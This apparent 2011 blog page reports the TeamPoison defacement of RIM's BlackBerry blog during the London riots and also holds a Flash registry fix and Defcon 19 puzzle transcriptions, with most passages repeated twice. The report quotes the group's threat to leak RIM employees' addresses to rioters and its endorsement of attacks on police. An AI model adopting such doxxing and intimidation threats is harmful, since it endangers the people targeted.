That decision didn't sit well with a hacking group going by the name TeamPoison, which claimed responsibility for hacking into the BlackBerry blog and posting its logo and a statement condemning RIM's cooperation with police who're looking to track those who took part in the riots and used BlackBerry Messenger as a way to communicate.
BlackBerry Messenger has reportedly become a favored mode of communication in the London riots since the service is private, pin-code protected and can only send messages between BlackBerry phones. Twitter too is also reportedly being used widely by rioters.
Jonathan H Fisher, a Twitter user, published a screenshot of the blog hacked and published it on the social networking service, which can be seen in the image above.
The statement published during the hack of the Inside BlackBerry blog read partly as a plea to RIM to stop working with police and partly a threat against the company if it continues its cooperation:
Dear RIM,
You Will _NOT_ assist the UK Police because if u do innocent members of the public who were at the wrong place at the wrong time and owned a blackberry will get charged for no reason at all, the Police are looking to arrest as many people as possible to save themselves from embarrassment…. if you do assist the police by giving them chat logs, gps locations, customer information & access to peoples BlackBerryMessengers you will regret it, we have access to your database which includes your employees information; e.g – Addresses, Names, Phone Numbers etc. – now if u assist the police, we _WILL_ make this information public and pass it onto rioters…. do you really want a bunch of angry youths on your employees doorsteps? Think about it…. and don't think that the police will protect your employees, the police can't protect themselves let alone protect others….. if you make the wrong choice your database will be made public, save yourself the embarrassment and make the right choice. don' be a puppet..
TeamPoison then went on to state that it didn't stand behind the riots, except for the parts in which civilians fight with law enforcement:
p.s – we do not condone in innocent people being attacked in these riots nor do we condone in small businesses being looted, but we are all for the rioters that are engaging in attacks on the police and government…. and before anyone says "the blackberry employees are innocent" no they are not! They are the ones that would be assisting the police.
Officials at RIM were unavailable for comment on the hacking, but the RIM blog wasn't available for much of the morning, although the blog currently seems to be back up and running.
Research In Motion's Inside BlackBerry blog was hacked on Tuesday after the Canadian smartphone maker said it would cooperate with London police who are investigating the role of BlackBerry users in the city's last three days of riots.
In a message on Twitter on Monday, RIM said that the company feels "for those impacted by the riots in London. We have engaged with the authorities to assist in any way we can."
That decision didn't sit well with a hacking group going by the name TeamPoison, which claimed responsibility for hacking into the BlackBerry blog and posting its logo and a statement condemning RIM's cooperation with police who're looking to track those who took part in the riots and used BlackBerry Messenger as a way to communicate.
BlackBerry Messenger has reportedly become a favored mode of communication in the London riots since the service is private, pin-code protected and can only send messages between BlackBerry phones. Twitter too is also reportedly being used widely by rioters.
Jonathan H Fisher, a Twitter user, published a screenshot of the blog hacked and published it on the social networking service, which can be seen in the image above.
The statement published during the hack of the Inside BlackBerry blog read partly as a plea to RIM to stop working with police and partly a threat against the company if it continues its cooperation:
Dear RIM,
You Will _NOT_ assist the UK Police because if u do innocent members of the public who were at the wrong place at the wrong time and owned a blackberry will get charged for no reason at all, the Police are looking to arrest as many people as possible to save themselves from embarrassment…. if you do assist the police by giving them chat logs, gps locations, customer information & access to peoples BlackBerryMessengers you will regret it, we have access to your database which includes your employees information; e.g – Addresses, Names, Phone Numbers etc. – now if u assist the police, we _WILL_ make this information public and pass it onto rioters…. do you really want a bunch of angry youths on your employees doorsteps? Think about it…. and don't think that the police will protect your employees, the police can't protect themselves let alone protect others….. if you make the wrong choice your database will be made public, save yourself the embarrassment and make the right choice. don' be a puppet..
TeamPoison then went on to state that it didn't stand behind the riots, except for the parts in which civilians fight with law enforcement:
p.s – we do not condone in innocent people being attacked in these riots nor do we condone in small businesses being looted, but we are all for the rioters that are engaging in attacks on the police and government…. and before anyone says "the blackberry employees are innocent" no they are not! They are the ones that would be assisting the police.
Officials at RIM were unavailable for comment on the hacking, but the RIM blog wasn't available for much of the morning, although the blog currently seems to be back up and running.
Adobe Flash Movie Links Fail Fix
Movies don't appear in browser after installing Flash Player
(i know this is not a hack, but this is a vault where I can go back later to look for fixes)
Issue
After you install a previous version of Flash Player, movies don't appear in the browser as expected. Sometimes, you receive the following error: "Object doesn't support this property or method."
Solutions
Do one of the following:
Solution 1: Install Flash Player 10.1.102.64 or later. Download Flash Player 10.1.102.64 or later from the Flash Player Download Center.
Solution 2: Manually remove the "kill bit" registry entry.
>> standard disclaimer just in case you blue screen your box <<
"Important: Adobe does not recommend manually editing the Windows registry unless you are already familiar with the Windows registry editor. Proceed with caution, and only if you feel confident changing the registry. Incorrectly modifying the Windows registry can result in serious Windows or application performance issues. Adobe Technical Support cannot be responsible for problems caused by modifications made to the Windows registry."
Note: If you are not comfortable editing the Windows registry, there are third-party applications available that can edit the registry. Spyware removal applications sometimes have tools that look for Flash Player registry entries and remove unnecessary items.
To manually remove the "kill bit" entry from the registry, look for the following registry item:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11CF-96B8-444553540000}\
Make sure that this registry item doesn't contain any strings. If there is a string value, it is most likely a set of compatibility flags, as shown below: This entry causes Flash movies to fail in the browser. Delete the compatibility flags entry and restart Internet Explorer.
Alternatively, you can also set the Value data to zero for Compatibility Flags.
Double-click Compatibility Flags. The following dialog box will appear: Set Value data to zero and Click OK.
Additional information
A "kill bit" entry in the Windows registry causes this error. Ad and pop-up blocker installations usually create this registry key. Uninstalling the pop-up blocker doesn't necessarily remove this registry entry.
(i know this is not a hack, but this is a vault where I can go back later to look for fixes)
Issue
After you install a previous version of Flash Player, movies don't appear in the browser as expected. Sometimes, you receive the following error: "Object doesn't support this property or method."
Solutions
Do one of the following:
Solution 1: Install Flash Player 10.1.102.64 or later. Download Flash Player 10.1.102.64 or later from the Flash Player Download Center.
Solution 2: Manually remove the "kill bit" registry entry.
>> standard disclaimer just in case you blue screen your box <<
"Important: Adobe does not recommend manually editing the Windows registry unless you are already familiar with the Windows registry editor. Proceed with caution, and only if you feel confident changing the registry. Incorrectly modifying the Windows registry can result in serious Windows or application performance issues. Adobe Technical Support cannot be responsible for problems caused by modifications made to the Windows registry."
Note: If you are not comfortable editing the Windows registry, there are third-party applications available that can edit the registry. Spyware removal applications sometimes have tools that look for Flash Player registry entries and remove unnecessary items.
To manually remove the "kill bit" entry from the registry, look for the following registry item:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11CF-96B8-444553540000}\
Make sure that this registry item doesn't contain any strings. If there is a string value, it is most likely a set of compatibility flags, as shown below: This entry causes Flash movies to fail in the browser. Delete the compatibility flags entry and restart Internet Explorer.
Alternatively, you can also set the Value data to zero for Compatibility Flags.
Double-click Compatibility Flags. The following dialog box will appear: Set Value data to zero and Click OK.
Additional information
A "kill bit" entry in the Windows registry causes this error. Ad and pop-up blocker installations usually create this registry key. Uninstalling the pop-up blocker doesn't necessarily remove this registry entry.
2011-08-06
Defcon 19 - Hacker Jeopardy!
this year is awesome.
with @snubs at Defcon 2011
Defcon 19 Pyramid Cipher
Found at the Defcon 19 Rotunda, between the Registration Desk & the Swag booth. I saw tweets this morning that a foot print sticker was added on Sunday.
1 D
4 E
11 F
16 C
24 O (foot print)
29 N
33 A
35 W
39 G
45 B
47 U
56 Y
58 K
62 R
64 I
69 S
73 V
78 X
80 P
84 L
89 Q
94 M
99 H
104 T
? Z
1 D
4 E
11 F
16 C
24 O (foot print)
29 N
33 A
35 W
39 G
45 B
47 U
56 Y
58 K
62 R
64 I
69 S
73 V
78 X
80 P
84 L
89 Q
94 M
99 H
104 T
? Z
Defcon 19 Lanyard
Here it is folks. Yes, it looks binary.... is it. There is a 7 and 5 at the bottom line.
Top Row (Beginning from Rotary Dial Side)
1110110000[logo]01
0[logo]11010010100
0110[logo]10010011
1111000[logo]00100
11[logo]1101101000
[logo]101010010000
111[logo]000100001
01101001010[logo]1
001010010[logo]011
0010100[logo]10100
011010[logo]
Bottom Row (Beginning from Rotary Dial Side)
010011
11100[logo]0000101
001010010100[logo]
111010010[logo]100
01001001[logo]0101
1010100010001.111010000000o.0010100100115.1111000000107.000000000000.000000000000.000000000000
Top Row (Beginning from Rotary Dial Side)
1110110000[logo]01
0[logo]11010010100
0110[logo]10010011
1111000[logo]00100
11[logo]1101101000
[logo]101010010000
111[logo]000100001
01101001010[logo]1
001010010[logo]011
0010100[logo]10100
011010[logo]
Bottom Row (Beginning from Rotary Dial Side)
010011
11100[logo]0000101
001010010100[logo]
111010010[logo]100
01001001[logo]0101
1010100010001.111010000000o.0010100100115.1111000000107.000000000000.000000000000.000000000000
2011-08-05
Defcon 19 Tools of the trade.
Subscribe to:
Posts (Atom)